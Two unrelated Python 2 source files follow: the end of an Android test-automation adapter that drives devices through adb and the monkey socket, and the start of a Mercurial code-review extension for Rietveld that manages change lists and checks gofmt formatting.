self._monkeySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._monkeySocket.connect((self._m_host, self._m_port))
self._monkeySocket.setblocking(0)
self._monkeySocket.settimeout(1.0)
self._platformVersion = self._monkeyCommand("getvar build.version.release", retry=0)[1]
if len(self._platformVersion) > 0:
self._monkeySocket.settimeout(5.0)
return True
except Exception, e:
pass
time.sleep(pollDelay)
if self._stopOnError:
msg = 'Android monkey error: cannot connect to "adb shell monkey --port 1080" to device %s' % (self._serialNumber)
_adapterLog(msg)
raise AndroidConnectionError(msg)
else:
return False
def _monkeyCommand(self, command, retry=3):
try:
self._monkeySocket.sendall(command + "\n")
data = self._monkeySocket.recv(4096).strip()
if len(data) == 0 and retry > 0:
return self._monkeyCommand(command, retry-1)
if data == "OK":
return True, None
elif data.startswith("OK:"):
return True, data.split("OK:")[1]
_adapterLog("monkeyCommand failing... command: '%s' response: '%s'" % (command, data))
return False, None
except socket.error:
try: self.sock.close()
except: pass
if retry > 0:
self._resetMonkey()
return self._monkeyCommand(command, retry=retry-1)
else:
raise AndroidConnectionError('Android monkey socket connection lost while sending command "%s"' % (command,))
def reboot(self, reconnect, firstBootAfterFlashing, timeout):
if firstBootAfterFlashing:
self._runAdb("root")
time.sleep(2)
self._runAdb("shell rm /data/data/com.android.launcher/shared_prefs/com.android.launcher2.prefs.xml")
self._runAdb("reboot")
_adapterLog("rebooting " + self._serialNumber)
if reconnect:
self._runAdb("wait-for-device")
endTime = time.time() + timeout
while time.time() < endTime:
try:
if self._resetMonkey(timeout=1, pollDelay=1):
break
except AndroidConnectionError:
pass
time.sleep(1)
else:
_adapterLog("reboot: reconnecting to " + self._serialNumber + " failed")
return False
self._resetWindow()
return True
def recvVariable(self, variableName):
ok, value = self._monkeyCommand("getvar " + variableName)
if ok: return value
else:
# LOG: getvar variableName failed
return None
def recvScreenSize(self):
try:
height = int(self.recvVariable("display.height"))
width = int(self.recvVariable("display.width"))
except TypeError:
return None, None
return width, height
def recvTopAppWindow(self):
_, output, _ = self._runAdb("shell dumpsys window", 0)
if self._platformVersion >= "4.2":
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8})( [^ ]*)? (?P<winName>[^}]*)\}", output)
else:
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8}) (?P<winName>[^ ]*) [^ ]*\}", output)
if s and len(s[0][-1].strip()) > 1: topWindowName = s[0][-1]
else: topWindowName = None
s = re.findall("mFocusedApp=AppWindowToken.*ActivityRecord\{#?[0-9A-Fa-f]{8}( [^ ]*)? (?P<appName>[^}]*)\}", output)
if s and len(s[0][-1].strip()) > 1:
topAppName = s[0][-1].strip()
else:
topAppName = None
return topAppName, topWindowName
def sendTap(self, xCoord, yCoord):
return self._monkeyCommand("tap " + str(xCoord) + " " + str(yCoord))[0]
def sendKeyUp(self, key):
return self._monkeyCommand("key up " + key)[0]
def sendKeyDown(self, key):
return self._monkeyCommand("key down " + key)[0]
def sendTouchUp(self, xCoord, yCoord):
return self._monkeyCommand("touch up " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchDown(self, xCoord, yCoord):
return self._monkeyCommand("touch down " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchMove(self, xCoord, yCoord):
return self._monkeyCommand("touch move " + str(xCoord) + " " + str(yCoord))[0]
def sendTrackBallMove(self, dx, dy):
return self._monkeyCommand("trackball " + str(dx) + " " + str(dy))[0]
def sendPress(self, key):
return self._monkeyCommand("press " + key)[0]
def sendType(self, text):
return self._monkeyCommand("type " + text)[0]
def screenshot(self, screenshotDir=None, imageFilename=None):
"""
Capture a screenshot and copy the image file to given path or
system temp folder.
Returns screenshot filename.
"""
if imageFilename == None:
filename = _filenameTimestamp() + "-" + self._serialNumber + '.png'
else:
filename = imageFilename
remotefile = '/sdcard/' + filename
status, _, _ = self._runAdb(['shell', 'screencap', '-p', remotefile], 0)
if status != 0: return None
if screenshotDir == None:
status, _, _ = self._runAdb(['pull', remotefile, tempfile.gettempdir()], 0)
else:
status, _, _ = self._runAdb(['pull', remotefile, os.path.join(screenshotDir, filename)], 0)
if status != 0: return None
status, _, _ = self._runAdb(['shell','rm', remotefile], 0)
if screenshotDir == None:
return os.path.join(tempfile.gettempdir(), filename)
else:
return os.path.join(screenshotDir, filename)
def shellSOE(self, shellCommand):
fd, filename = tempfile.mkstemp(prefix="fmbtandroid-shellcmd-")
remotename = '/sdcard/' + os.path.basename(filename)
os.write(fd, shellCommand + "\n")
os.close(fd)
self._runAdb("push %s %s" % (filename, remotename), 0)
cmd = "shell 'source %s >%s.out 2>%s.err; echo $? > %s.status" % ((remotename,)*4)
if self._shellSupportsTar:
# do everything we can in one command to minimise adb
# commands: execute command, record results, package,
# print uuencoded package and remove remote temp files
cmd += "; cd %s; tar czf - %s.out %s.err %s.status | uuencode %s.tar.gz; rm -f %s*'" % (
(os.path.dirname(remotename),) + ((os.path.basename(remotename),) * 5))
status, output, error = self._runAdb(cmd, 0)
file(filename, "w").write(output)
uu.decode(filename, out_file=filename + ".tar.gz")
import tarfile
tar = tarfile.open(filename + ".tar.gz")
basename = os.path.basename(filename)
stdout = tar.extractfile(basename + ".out").read()
stderr = tar.extractfile(basename + ".err").read()
try: exitstatus = int(tar.extractfile(basename + ".status").read())
except: exitstatus = None
os.remove(filename)
os.remove(filename + ".tar.gz")
else:
# need to pull files one by one, slow.
cmd += "'"
self._runAdb(cmd, 0)
stdout = self._cat(remotename + ".out")
stderr = self._cat(remotename + ".err")
try: exitstatus = int(self._cat(remotename + ".status"))
except: exitstatus = None
self._runAdb("shell rm -f %s.out %s.err %.status" % ((remotename,)*3))
return exitstatus, stdout, stderr
def recvViewData(self, retry=3):
_dataBufferLen = 4096 * 16
try:
self._windowSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._windowSocket.connect( (self._w_host, self._w_port) )
# DUMP -1: get foreground window info
if self._windowSocket.sendall("DUMP -1\n") == 0:
# LOG: readGUI cannot write to window socket
raise AdapterConnectionError("writing socket failed")
# Read until a "DONE" line
data = ""
while True:
try: newData = self._windowSocket.recv(_dataBufferLen)
except socket.timeout:
continue
data += newData
if data.splitlines()[-1] == "DONE" or newData == '':
break
return data
except Exception, msg:
_adapterLog("recvViewData: window socket error: %s" % (msg,))
if retry > 0:
self._resetWindow()
return self.recvViewData(retry=retry-1)
else:
msg = "recvViewData: cannot read window socket"
_adapterLog(msg)
raise AndroidConnectionError(msg)
finally:
try: self._windowSocket.close()
except: pass
class AndroidConnectionError(Exception): pass
class AndroidConnectionLost(AndroidConnectionError): pass
class AndroidDeviceNotFound(AndroidConnectionError): pass
|
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
# We require Python 2.6 for the json package.
if sys.version < '2.6':
print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
print >>sys.stderr, "You are running Python " + sys.version
sys.exit(2)
import json
import os
import re
import stat
import subprocess
import threading
import time
from mercurial import commands as hg_commands
from mercurial import util as hg_util
defaultcc = None
codereview_disabled = None
real_rollback = None
releaseBranch = None
server = "codereview.appspot.com"
server_url_base = None
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
if type(s) != t:
raise hg_util.Abort("type check failed: %s has type %s != %s" % (repr(s), type(s), t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
typecheck(s, str)
return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
from mercurial import encoding
encoding.encoding = 'utf-8'
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
import sys
stdout, __stdout__ = sys.stdout, sys.__stdout__
reload(sys) # site.py deleted setdefaultencoding; get it back
sys.stdout, sys.__stdout__ = stdout, __stdout__
sys.setdefaultencoding('utf-8')
default_to_utf8()
#######################################################################
# Status printer for long-running commands
global_status = None
def set_status(s):
# print >>sys.stderr, "\t", time.asctime(), s
global global_status
global_status = s
class StatusThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# pause a reasonable amount of time before
# starting to display status messages, so that
# most hg commands won't ever see them.
time.sleep(30)
# now show status every 15 seconds
while True:
time.sleep(15 - time.time() % 15)
s = global_status
if s is None:
continue
if s == "":
s = "(unknown status)"
print >>sys.stderr, time.asctime(), s
def start_status_thread():
t = StatusThread()
t.setDaemon(True) # allowed to exit if t is still running
t.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
def __init__(self, name):
typecheck(name, str)
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.copied_from = None # None means current user
self.mailed = False
self.private = False
self.lgtm = []
def DiskText(self):
cl = self
s = ""
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n\n"
if cl.private:
s += "Private: " + str(self.private) + "\n"
s += "Mailed: " + str(self.mailed) + "\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
typecheck(s, str)
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
if cl.private:
s += "Private: True\n"
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
typecheck(s, str)
return s
def PendingText(self, quick=False):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.copied_from:
s += "\tAuthor: " + cl.copied_from + "\n"
if not quick:
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
for (who, line) in cl.lgtm:
s += "\t\t" + who + ": " + line + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
typecheck(s, str)
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
if sys.platform == "win32" and os.path.isfile(path):
os.remove(path)
os.rename(path+'!', path)
if self.web and not self.copied_from:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
private=self.private)
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
typecheck(s, str)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
if not self.files and not creating:
ui.warn("no files in change list\n")
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
set_status("uploading CL metadata + diffs")
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
]
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = None
# We do not include files when creating the issue,
# because we want the patch sets to record the repository
# and base revision they are diffs against. We use the patch
# set message for that purpose, but there is no message with
# the first patch set. Instead the message gets used as the
# new CL's overall subject. So omit the diffs when creating
# and then we'll run an immediate upload.
# This has the effect that every CL begins with an empty "Patch set 1".
if self.files and not creating:
vcs = MercurialVCS(upload_options, ui, repo)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
else:
uploaded_diff_file = [("data", "data.diff", emptydiff)]
if vcs and self.name != "new":
form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
else:
# First upload sets the subject for the CL itself.
form_fields.append(("subject", self.Subject()))
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
if response_body.startswith("Issue updated.") and quiet:
pass
else:
ui.status(msg + "\n")
set_status("uploaded CL metadata + diffs")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise hg_util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
set_status("uploading patches")
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
if vcs:
set_status("uploading base files")
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
set_status("sending mail")
MySend("/" + issue + "/mail", payload="")
self.web = True
set_status("flushing changes to disk")
self.Flush(ui, repo)
return
def Mail(self, ui, repo):
pmsg = "Hello " + JoinComma(self.reviewer)
if self.cc:
pmsg += " (cc: %s)" % (', '.join(self.cc),)
pmsg += ",\n"
pmsg += "\n"
repourl = ui.expandpath("default")
if not self.mailed:
pmsg += "I'd like you to review this change to\n" + repourl + "\n"
else:
pmsg += "Please take another look.\n"
typecheck(pmsg, str)
PostMessage(ui, self.name, pmsg, subject=self.Subject())
self.mailed = True
self.Flush(ui, repo)
def GoodCLName(name):
typecheck(name, str)
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
typecheck(text, str)
typecheck(name, str)
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
'Mailed': '',
'Private': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.copied_from = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
line = line.strip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if sections['Mailed'] != 'False':
# Odd default, but avoids spurious mailings when
# reading old CLs that do not have a Mailed: line.
# CLs created with this update will always have
# Mailed: False on disk.
cl.mailed = True
if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
cl.private = True
if cl.desc == '<enter description here>':
cl.desc = ''
return cl, 0, ''
def SplitCommaSpace(s):
typecheck(s, str)
s = s.strip()
if s == "":
return []
return re.split(", *", s)
def CutDomain(s):
typecheck(s, str)
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
for s in l:
typecheck(s, str)
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
typecheck(name, str)
set_status("loading CL " + name)
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
set_status("getting issue metadata from web")
d = JSONGet(ui, "/api/" + name + "?messages=true")
set_status(None)
if d is None:
return None, "cannot load CL %s from server" % (name,)
if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
return None, "malformed response loading CL data from code review server"
cl.dict = d
cl.reviewer = d.get('reviewers', [])
cl.cc = d.get('cc', [])
if cl.local and cl.copied_from and cl.desc:
# local copy of CL written by someone else
# and we saved a description. use that one,
# so that committers can edit the description
# before doing hg submit.
pass
else:
cl.desc = d.get('description', "")
cl.url = server_url_base + name
cl.web = True
cl.private = d.get('private', False) != False
cl.lgtm = []
for m in d.get('messages', []):
if m.get('approval', False) == True:
who = re.sub('@.*', '', m.get('sender', ''))
text = re.sub("\n(.|\n)*", '', m.get('text', ''))
cl.lgtm.append((who, text))
set_status("loaded CL " + name)
return cl, ''
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
typecheck(url, str)
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
typecheck(dir, str)
return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
i = 0
while i < len(line) and line[i] == '\t':
i += 1
return ' '*(8*i) + line[i:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
typecheck(text, str)
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
line = TabsToSpaces(line)
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
line = TabsToSpaces(line)
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
typecheck(t, str)
return t
# Indent text with indent.
def Indent(text, indent):
typecheck(text, str)
typecheck(indent, str)
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
typecheck(t, str)
return t
# Return the first line of l
def line1(text):
typecheck(text, str)
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
def promptremove(ui, repo, f):
if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
if hg_commands.remove(ui, repo, 'path:'+f) != 0:
ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
if hg_commands.add(ui, repo, 'path:'+f) != 0:
ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
set_status(None) # do not show status
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
# We can't trust Mercurial + Python not to die before making the change,
# so, by popular demand, just scribble the most recent CL edit into
# $(hg root)/last-change so that if Mercurial does die, people
# can look there for their work.
try:
f = open(repo.root+"/last-change", "w")
f.write(s)
f.close()
except:
pass
clx, line, err = ParseCL(s, cl.name)
if err != '':
if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
return "change list not modified"
continue
# Check description.
if clx.desc == '':
if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
continue
elif re.search('<enter reason for undo>', clx.desc):
if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
continue
elif not re.match(desc_re, clx.desc.split('\n')[0]):
if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
continue
# Check file list for files that need to be hg added or hg removed
# or simply aren't understood.
pats = ['path:'+f for f in clx.files]
changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
clean = hg_matchPattern(ui, repo, *pats, clean=True)
files = []
for f in clx.files:
if f in changed:
files.append(f)
continue
if f in deleted:
promptremove(ui, repo, f)
files.append(f)
continue
if f in unknown:
promptadd(ui, repo, f)
files.append(f)
continue
if f in ignored:
ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
continue
if f in clean:
ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
files.append(f)
continue
p = repo.root + '/' + f
if os.path.isfile(p):
ui.warn("warning: %s is a file but not known to hg\n" % (f,))
files.append(f)
continue
if os.path.isdir(p):
ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
continue
ui.warn("error: %s does not exist; omitting\n" % (f,))
clx.files = files
cl.desc = clx.desc
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
cl.private = clx.private
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if not cl.files:
return None, "no files changed"
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if defaultcc:
cl.cc = Add(cl.cc, defaultcc)
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
#######################################################################
# Change list file management
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
taken = taken or {}
# Run each pattern separately so that we can warn about
# patterns that didn't do anything useful.
for p in pats:
for f in hg_matchPattern(ui, repo, p, unknown=True):
promptadd(ui, repo, f)
for f in hg_matchPattern(ui, repo, p, removed=True):
promptremove(ui, repo, f)
files = hg_matchPattern(ui, repo, p, modified=True, added=True, removed=True)
for f in files:
if f in taken:
ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
if not files:
ui.warn("warning: %s did not match any modified files\n" % (p,))
# Again, all at once (eliminates duplicates)
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
l.sort()
if taken:
l = Sub(l, taken.keys())
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
l = hg_matchPattern(ui, repo, *pats, modified=True, added=True)
l.sort()
return l
# Return list of files claimed by existing CLs
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
return ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
#######################################################################
# File format checking.
def CheckFormat(ui, repo, files, just_warn=False):
set_status("running gofmt")
CheckGofmt(ui, repo, files, just_warn)
CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
files = [f for f in files if (not f.startswith('test/') or f.startswith('test/bench/')) and f.endswith('.go')]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
if not files:
return
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
cmd.stdin.close()
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
set_status("done with gofmt")
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
badfiles = []
for f in files:
try:
for line in open(f, 'r'):
# Four leading spaces is enough to complain about,
# except that some Plan 9 code uses four spaces as the label indent,
# so allow that.
if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
badfiles.append(f)
break
except:
# ignore cannot open file, etc.
pass
if len(badfiles) > 0:
msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
